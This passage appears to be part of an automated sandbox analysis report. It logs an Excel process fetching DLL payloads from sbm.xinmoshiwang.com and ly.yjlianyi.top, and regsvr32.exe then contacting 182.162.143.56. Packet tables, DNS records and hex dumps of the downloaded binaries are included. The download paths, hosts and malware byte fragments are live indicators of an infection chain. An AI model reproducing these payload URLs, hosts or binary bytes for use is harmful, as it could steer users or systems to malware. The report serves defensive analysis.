Nov 13, 2022 19:28:51.300550938 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:51.545568943 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:51.546385050 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:51.790708065 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:51.792527914 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.239193916 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.240082026 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.479041100 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.479104042 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.479149103 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.479258060 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.479980946 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.718075037 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.718138933 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.718187094 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.718286991 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.718367100 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.718691111 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.958302021 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.958374023 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.958420038 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:52.958576918 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:52.958646059 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.197268963 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.197346926 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.197391987 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.197436094 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.207072020 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.445914030 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.445986986 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.446027994 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.446103096 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.690897942 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.690963030 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.691009998 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.691057920 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.691246033 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:53.933927059 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:53.934134960 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:55.521183968 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:55.521925926 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:55.769150972 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:55.769186974 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:55.769850016 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.008459091 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.008501053 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.008625031 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.008625984 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.248534918 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.248573065 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.248590946 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.248611927 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.248910904 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.248910904 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.487696886 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.487729073 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.487749100 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.487766027 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.487787008 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.487844944 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.488027096 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.728187084 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.728220940 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.728233099 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.728245974 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.728260994 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.728420973 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:56.988043070 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:56.988173962 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:57.241899967 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:57.242136002 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:57.939167023 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:57.939332008 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:58.190120935 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:58.190283060 CET	49703	80	192.168.2.3	81.68.152.197
Nov 13, 2022 19:28:58.462728024 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:58.462841988 CET	80	49703	81.68.152.197	192.168.2.3
Nov 13, 2022 19:28:58.463097095 CET	49703	80	192.168.2.3	81.68.152.197

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 13, 2022 19:26:49.247679949 CET	55847	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:49.745223999 CET	53	55847	1.1.1.1	192.168.2.3
Nov 13, 2022 19:26:51.035073042 CET	64213	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:51.582151890 CET	53	64213	1.1.1.1	192.168.2.3
Nov 13, 2022 19:26:57.543345928 CET	52281	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:26:57.751965046 CET	53	52281	1.1.1.1	192.168.2.3
Nov 13, 2022 19:27:02.730665922 CET	63177	53	192.168.2.3	1.1.1.1
Nov 13, 2022 19:27:03.479362965 CET	53	63177	1.1.1.1	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 13, 2022 19:26:49.247679949 CET	192.168.2.3	1.1.1.1	0xa733	Standard query (0)	datie-tw.com	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:51.035073042 CET	192.168.2.3	1.1.1.1	0xa2a2	Standard query (0)	sbm.xinmoshiwang.com	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:57.543345928 CET	192.168.2.3	1.1.1.1	0xa26	Standard query (0)	copunupo.ac.zm	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:27:02.730665922 CET	192.168.2.3	1.1.1.1	0x5c13	Standard query (0)	ly.yjlianyi.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 13, 2022 19:26:49.745223999 CET	1.1.1.1	192.168.2.3	0xa733	No error (0)	datie-tw.com	175.98.167.165	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:51.582151890 CET	1.1.1.1	192.168.2.3	0xa2a2	No error (0)	sbm.xinmoshiwang.com	47.92.35.35	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:26:57.751965046 CET	1.1.1.1	192.168.2.3	0xa26	No error (0)	copunupo.ac.zm	41.63.0.22	A (IP address)	IN (0x0001)	false
Nov 13, 2022 19:27:03.479362965 CET	1.1.1.1	192.168.2.3	0x5c13	No error (0)	ly.yjlianyi.top	81.68.152.197	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

datie-tw.com

copunupo.ac.zm

182.162.143.56

sbm.xinmoshiwang.com

ly.yjlianyi.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49697	175.98.167.165	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49701	41.63.0.22	443	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49712	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49713	182.162.143.56	443	C:\Windows\System32\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49699	47.92.35.35	80	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 13, 2022 19:26:51.795133114 CET	1133	OUT	GET /upload/VaOfWEb3pW76UO/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: sbm.xinmoshiwang.com Connection: Keep-Alive
Nov 13, 2022 19:26:52.000014067 CET	1134	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Nov 2022 18:26:51 GMT Content-Type: application/x-msdownload Content-Length: 433152 Connection: keep-alive X-Powered-By: PHP/7.1.5 Set-Cookie: 637136ebdcf92=1668364011; expires=Sun, 13-Nov-2022 18:27:51 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Sun, 13 Nov 2022 18:26:51 GMT Expires: Sun, 13 Nov 2022 18:26:51 GMT Content-Disposition: attachment; filename="EvvmhfKiKFhKrSuHfBq.dll" Content-Transfer-Encoding: binary Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"llllll*ll+ll,llRichlPEd)mc" [@pgW\dT 8.text `.rdataG H@@.data/pN@.pdataj@@text@ .rsrcT@@.re
Nov 13, 2022 19:26:52.000138044 CET	1136	IN	Data Raw: 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: loc@B
Nov 13, 2022 19:26:52.000225067 CET	1137	IN	Data Raw: 48 83 63 10 00 83 63 18 00 b0 01 eb 02 32 c0 48 83 c4 20 5b c3 cc cc 48 8d 05 b1 48 02 00 48 89 01 c3 cc 33 c0 c3 cc 48 8b 51 20 66 0f 6e 4c 24 40 0f 14 db 0f 5a c3 0f 5a c9 f2 0f 5e 05 35 17 06 00 f2 0f 2c c0 66 0f 6e 44 24 28 0f 5a c0 01 02 f2 Data Ascii: Hcc2H [HHH3HQ fnL$@ZZ^5,fnD$(Z^,fnD$0ZB3YBBB\B3A@SH YuHtLSAP0H [H\$Ht$WH HIHH!HAH4
Nov 13, 2022 19:26:52.000313997 CET	1138	IN	Data Raw: 61 2b 00 00 90 48 8b d0 48 8b cb e8 95 24 00 00 90 48 39 7d e0 72 09 48 8b 4d c8 e8 59 31 00 00 4c 8d 05 8a 35 05 00 48 8b d3 48 8d 4d c8 e8 32 2b 00 00 90 48 8b d0 48 8b cb e8 66 24 00 00 90 48 39 7d e0 72 09 48 8b 4d c8 e8 2a 31 00 00 4c 8d 05 Data Ascii: a+HH$H9}rHMY1L5HHM2+HHf$H9}rHM1LKdHHM+HH7$H9}rHM0LHHMHH$H9}rHM0LHHMHH#H9}rHM0LHHMvH
Nov 13, 2022 19:26:52.000385046 CET	1140	IN	Data Raw: 00 00 98 2d cb 36 c7 85 b4 00 00 00 33 1b 23 ff c7 85 b8 00 00 00 16 01 00 3e c7 85 bc 00 00 00 06 32 6f 98 c7 85 c0 00 00 00 29 5c 5d 2a c7 85 c4 00 00 00 0c 04 14 c7 c7 85 c8 00 00 00 31 76 3f 21 c7 85 cc 00 00 00 00 1d 25 f6 c7 85 d0 00 00 00 Data Ascii: -63#>2o)\]*1v?!% S#0]#&,G<\|v_&s+9F="X2;d&->?R%"
Nov 13, 2022 19:26:52.000454903 CET	1141	IN	Data Raw: c7 85 b4 02 00 00 1a 24 2b cb c7 85 b8 02 00 00 83 20 e0 b4 c7 85 bc 02 00 00 76 1e 0f 03 c7 85 c0 02 00 00 35 23 1b 52 c7 85 c4 02 00 00 27 49 96 08 c7 85 c8 02 00 00 6b 30 32 84 c7 85 cc 02 00 00 f3 2c 66 44 c7 85 d0 02 00 00 fe 53 ca 84 c7 85 Data Ascii: $+ v5#R'Ik02,fDS&b`uf3{g%%R35UQ$f"`#[mk
Nov 13, 2022 19:26:52.000525951 CET	1142	IN	Data Raw: 76 9b 59 31 c7 85 b8 04 00 00 64 3f da 69 c7 85 bc 04 00 00 56 71 65 f7 c7 85 c0 04 00 00 99 29 e8 64 c7 85 c4 04 00 00 1a 79 4f 32 c7 85 c8 04 00 00 1f 26 b8 38 c7 85 cc 04 00 00 e8 07 25 16 c7 85 d0 04 00 00 6e b9 7d 70 c7 85 d4 04 00 00 a8 62 Data Ascii: vY1d?iVqe)dyO2&8%n}pbiFx16s1k8R%gG!_Kxm'@J-qhP V"\|'Lr
Nov 13, 2022 19:26:52.000581980 CET	1144	IN	Data Raw: b8 06 00 00 f1 ce 4f 44 c7 85 bc 06 00 00 53 db 76 31 c7 85 c0 06 00 00 64 77 dc ad c7 85 c4 06 00 00 1d 33 a1 bf c7 85 c8 06 00 00 0a 88 2b fc c7 85 cc 06 00 00 16 5c 7b 70 c7 85 d0 06 00 00 d9 ed 2d f2 c7 85 d4 06 00 00 17 62 29 1a c7 85 d8 06 Data Ascii: ODSv1dw3+\{p-b)G4nLvmd"o-@-Hga+{Pm\9Kc+^w".d
Nov 13, 2022 19:26:52.000658989 CET	1145	IN	Data Raw: 69 4a c7 85 bc 08 00 00 78 6d 23 5f c7 85 c0 08 00 00 34 0c 0e 19 c7 85 c4 08 00 00 12 38 09 6f c7 85 c8 08 00 00 3f 2a 94 a9 c7 85 cc 08 00 00 1d bb ae 08 c7 85 d0 08 00 00 d6 30 6b 3d c7 85 d4 08 00 00 db 10 5b 70 c7 85 d8 08 00 00 db 55 70 31 Data Ascii: iJxm#_48o?0k=[pUp1>;0hqw/DSd!D-`r:s8:{ugF!_,w! $@IDkSA
Nov 13, 2022 19:26:52.000716925 CET	1147	IN	Data Raw: 41 55 41 56 41 57 48 83 ec 20 48 63 35 d8 52 06 00 48 63 3d d9 52 06 00 4c 63 25 d6 52 06 00 4c 63 0d c7 52 06 00 4c 63 15 b8 52 06 00 4c 8b f1 41 8b c1 4c 8b ef 4c 8b fe 4d 2b f9 b9 02 00 00 00 49 2b ca 4d 03 ff 0f af c7 48 63 d8 49 8d 44 24 01 Data Ascii: AUAVAWH Hc5RHc=RLc%RLcRLcRLALLM+I+MHcID$HHH+I+EHJcD1<B0IcL+IL+M+MkxLJ&H@AG I<RLHcA$ADHcIcIH+LD$`H+AGH+I3IIH4A9_v%Hl$hAH
Nov 13, 2022 19:26:52.194159031 CET	1148	IN	Data Raw: 61 06 00 d1 f8 44 8b c0 89 05 21 61 06 00 8b c1 99 44 89 05 1f 61 06 00 2b c2 d1 f8 89 05 11 61 06 00 89 05 13 61 06 00 eb 69 ff 15 a7 e6 01 00 85 c0 75 19 4c 8d 05 b4 ed 05 00 48 8d 15 45 ee 05 00 45 33 c9 33 c9 ff 15 02 e6 01 00 48 83 3d ca 60 Data Ascii: aD!aDa+aaiuLHEE33H=`tGH`HPH%`H`HtHPH%`33HL$pH3HA\_^][HaHAH@SH HaHAHH"HH

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49703	81.68.152.197	80	C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 13, 2022 19:27:03.733864069 CET	2084	OUT	GET /wp-admin/4cChao/ HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: ly.yjlianyi.top Connection: Keep-Alive
Nov 13, 2022 19:27:03.996579885 CET	2086	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 13 Nov 2022 18:27:03 GMT Content-Type: application/x-msdownload Content-Length: 433152 Connection: keep-alive Set-Cookie: 637136f7d44c4=1668364023; expires=Sun, 13-Nov-2022 18:28:03 GMT; Max-Age=60; path=/ Cache-Control: no-cache, must-revalidate Pragma: no-cache Last-Modified: Sun, 13 Nov 2022 18:27:03 GMT Expires: Sun, 13 Nov 2022 18:27:03 GMT Content-Disposition: attachment; filename="2yXcjy57oZTTUNweDidCGUY.dll" Content-Transfer-Encoding: binary Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b6 98 df 3f f2 f9 b1 6c f2 f9 b1 6c f2 f9 b1 6c 9d 8f 1a 6c d6 f9 b1 6c 9d 8f 1b 6c a0 f9 b1 6c 9d 8f 2f 6c ff f9 b1 6c fb 81 32 6c f3 f9 b1 6c fb 81 22 6c fb f9 b1 6c f2 f9 b0 6c 91 f9 b1 6c 9d 8f 1e 6c f1 f9 b1 6c 9d 8f 2a 6c f3 f9 b1 6c 9d 8f 2b 6c f3 f9 b1 6c 9d 8f 2c 6c f3 f9 b1 6c 52 69 63 68 f2 f9 b1 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 1c 29 6d 63 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 02 02 00 00 96 04 00 00 00 00 00 dc 5b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 06 00 00 04 00 00 a7 e4 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 70 67 06 00 57 00 00 00 b4 5c 06 00 64 00 00 00 00 d0 06 00 54 02 00 00 00 a0 06 00 c4 1a 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 ec 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 01 02 00 00 10 00 00 00 02 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c7 47 04 00 00 20 02 00 00 48 04 00 00 06 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d0 2f 00 00 00 70 06 00 00 1c 00 00 00 4e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c4 1a 00 00 00 a0 06 00 00 1c 00 00 00 6a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 74 65 78 74 00 00 00 00 1d 09 00 00 00 c0 06 00 00 0a 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 20 2e 72 73 72 63 00 00 00 54 02 00 00 00 d0 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f6 07 00 00 00 e0 06 00 00 08 00 00 00 94 06 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$?lllllll/ll2ll"llllll*ll+ll,llRichlPEd)mc" [@pgW\dT 8.text `.rdataG H@@.data/pN@.pdataj@@text@ .rsrcT@@.reloc
Nov 13, 2022 19:27:03.996642113 CET	2087	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @B
Nov 13, 2022 19:27:03.996686935 CET	2088	IN	Data Raw: cc cc 48 8d 05 b1 48 02 00 48 89 01 c3 cc 33 c0 c3 cc 48 8b 51 20 66 0f 6e 4c 24 40 0f 14 db 0f 5a c3 0f 5a c9 f2 0f 5e 05 35 17 06 00 f2 0f 2c c0 66 0f 6e 44 24 28 0f 5a c0 01 02 f2 0f 5e 05 1e 17 06 00 f2 0f 2c c0 66 0f 6e 44 24 30 0f 5a c0 01 Data Ascii: HHH3HQ fnL$@ZZ^5,fnD$(Z^,fnD$0ZB3YBBB\B3A@SH YuHtLSAP0H [H\$Ht$WH HIHH!HAH4t$HAH
Nov 13, 2022 19:27:03.996728897 CET	2090	IN	Data Raw: 72 09 48 8b 4d c8 e8 59 31 00 00 4c 8d 05 8a 35 05 00 48 8b d3 48 8d 4d c8 e8 32 2b 00 00 90 48 8b d0 48 8b cb e8 66 24 00 00 90 48 39 7d e0 72 09 48 8b 4d c8 e8 2a 31 00 00 4c 8d 05 4b 64 05 00 48 8b d3 48 8d 4d c8 e8 03 2b 00 00 90 48 8b d0 48 Data Ascii: rHMY1L5HHM2+HHf$H9}rHM1LKdHHM+HH7$H9}rHM0LHHMHH$H9}rHM0LHHMHH#H9}rHM0LHHMvHH#H9}rHMn
Nov 13, 2022 19:27:03.996774912 CET	2091	IN	Data Raw: 00 16 01 00 3e c7 85 bc 00 00 00 06 32 6f 98 c7 85 c0 00 00 00 29 5c 5d 2a c7 85 c4 00 00 00 0c 04 14 c7 c7 85 c8 00 00 00 31 76 3f 21 c7 85 cc 00 00 00 00 1d 25 f6 c7 85 d0 00 00 00 20 53 23 11 c7 85 d4 00 00 00 30 5d 23 26 c7 85 d8 00 00 00 98 Data Ascii: >2o)\]*1v?!% S#0]#&,G<\|v_&s+9F="X2;d&->?R%"mbL
Nov 13, 2022 19:27:04.238718033 CET	2093	IN	Data Raw: 61 06 00 2b c2 d1 f8 89 05 11 61 06 00 89 05 13 61 06 00 eb 69 ff 15 a7 e6 01 00 85 c0 75 19 4c 8d 05 b4 ed 05 00 48 8d 15 45 ee 05 00 45 33 c9 33 c9 ff 15 02 e6 01 00 48 83 3d ca 60 06 00 00 74 1a e8 47 d7 ff ff 48 8b 0d bc 60 06 00 48 8b 01 ff Data Ascii: a+aaiuLHEE33H=`tGH`HPH%`H`HtHPH%`33HL$pH3HA\_^][HaHAH@SH HaHAHH"HHHH [@SH
Nov 13, 2022 19:27:04.238795042 CET	2094	IN	Data Raw: e8 33 9e 01 00 cc 33 ff 48 39 51 18 73 0b 4c 8b 41 10 e8 71 01 00 00 eb 60 45 84 c0 74 45 48 83 fa 10 73 3f 48 8b 69 10 48 3b d5 48 0f 42 ea 48 83 79 18 10 72 1b 4c 8b 21 48 85 ed 74 0b 4c 8b c5 49 8b d4 e8 f3 09 00 00 49 8b cc e8 e3 08 00 00 48 Data Ascii: 33H9QsLAq`EtEHs?HiH;HBHyrL!HtLIIHCHk@<+HuHyHyrH@;H\$0Hl$8H\|$HHHt$@H A\LHt3HyrHHH;rHyrHHHAHI;v2H(HLH\
Nov 13, 2022 19:27:04.491764069 CET	2095	IN	Data Raw: 85 bc 02 00 00 76 1e 0f 03 c7 85 c0 02 00 00 35 23 1b 52 c7 85 c4 02 00 00 27 49 96 08 c7 85 c8 02 00 00 6b 30 32 84 c7 85 cc 02 00 00 f3 2c 66 44 c7 85 d0 02 00 00 fe 53 ca 84 c7 85 d4 02 00 00 26 62 14 bc c7 85 d8 02 00 00 60 75 bc 66 c7 85 dc Data Ascii: v5#R'Ik02,fDS&b`uf3{g%%R35UQ$f"`#[mk*a%
